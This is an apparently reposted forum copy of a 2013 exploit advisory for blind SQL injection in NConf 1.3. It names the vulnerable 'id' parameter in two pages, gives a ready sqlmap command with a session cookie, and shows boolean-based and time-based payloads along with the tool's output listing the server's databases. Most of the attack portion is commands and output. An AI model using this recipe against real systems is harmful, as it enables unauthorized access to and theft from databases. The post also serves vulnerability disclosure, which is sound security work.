Praetorian503 Posted January 23, 2013 Report Posted January 23, 2013 NConf version 1.3 suffers from remote blind SQL injection vulnerabilities in multiple parameters.# Exploit Title: nconf detail.php?detail_admin_items.php blind injection# Date: 2013/1/20# Exploit Author: haidao?54haidao@gmail.com# Software Link: http://sourceforge.net/projects/nconf/files/nconf/# Version: nconf 1.3# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3i find two files we can inject :/nconf/detail.php?id=1/nconf/detail_admin_items.php?type=attr&class=host&id=207both the inject point is 'id',, u can inject it by sqlmap,,of course u mast have a account to login.inject like this:python sqlmap.py -u "http://192.168.2.103/nconf/detail.php?id=1" -p id --cookie="XXX" --dbs[*] starting at 23:45:22[23:45:22] [INFO] resuming back-end DBMS 'mysql'[23:45:22] [INFO] testing connection to the target urlsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 6429=6429 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5)---[23:45:22] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOS 6.3web application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5.0.11[23:45:22] [INFO] fetching database names[23:45:22] [INFO] fetching number of databases[23:45:22] [INFO] resumed: 3[23:45:22] [INFO] resumed: information_schema[23:45:22] [INFO] resumed: nconf[23:45:22] [INFO] resumed: testavailable databases [3]:[*] information_schema[*] nconf[*] testSource: PacketStorm Quote
